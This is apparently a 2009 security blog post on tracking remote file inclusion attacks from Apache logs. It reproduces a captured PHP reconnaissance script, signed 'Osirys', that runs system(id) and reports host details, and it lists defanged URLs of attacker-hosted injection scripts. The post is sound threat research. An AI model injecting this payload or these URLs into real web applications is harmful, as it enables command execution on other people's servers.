DDoS and Security Reports

I’ve started to collect RFI attempts, logging the attacking IP and what the URL they’re trying to include is. I’ve started to work on this because I’m looking for certain botnets and tools used by them, and they’re not accessible otherwise. This seems like an under-studied area of botnet tracking. Most of the time I find these little “tracker” scripts that are used to mark a site as worth coming back to. They have modest AV detection and often look like this:

function ConvertBytes($number) {
$len = strlen($number);
if($len < 4) {
return sprintf("%d b", $number); }
if($len >= 4 && $len <=6) {
return sprintf("%0.2f Kb", $number/1024); }
if($len >= 7 && $len <=9) {
return sprintf("%0.2f Mb", $number/1024/1024); }
return sprintf("%0.2f Gb", $number/1024/1024/1024); }
#
echo "Osirys<br>";
$un = @php_uname();
$id1 = system(id);
$pwd1 = @getcwd();
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;
#
echo "0sirys was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "id: $id1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;

0sirys is a very common handle in these I’m finding.

So far since the 15th, when I’ve started to actually store these logs, I’ve seen the following countries hosting RFI scripts. It’s no surprise that the US dominates with so much web hosting:

The US also dominates by the number of scanning IPs, ones seeking to exploit a web app:

Discovering these is pretty easy, just some regex filters over Apache logs followed up by some simple processing and storage in a database. So far the most popular script I’ve seen injected is this one:

hxxp://fasttorrent.org//admin/x/copyright.txt
hxxp://redwoodtv.co.uk/images/fx29id1.txt
hxxp://www.gm-immobilien.info/components/com_id/fx29id
hxxp://www.vust.net/contrex/id1.txt
hxxp://www.tos-belarus.org/scan/copyright.txt
hxxp://203.114.112.155/webboard1234/1.jpg
hxxp://ballermarketing.com/article_directory/includes/id.txt
hxxp://i0.co.kr/i0mall//admin/idxx.txt
hxxp://www.thedead.se/vnc/fx29id.txt

It looks like a simple marker for success, as opposed to an agent. Defense against these sorts of attacks is usually all about updating scripts and the like. AV is rarely ever invoked. But this appears to be a growing problem in the botnet community, and one that wont be going away soon without a solid, popular solution.

Popularity: 5% [?]

This entry was posted on Wednesday, January 28th, 2009 at 6:24 pm and is filed under Attacks and DDoS Attacks, Botnets, Vulnerabilities. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.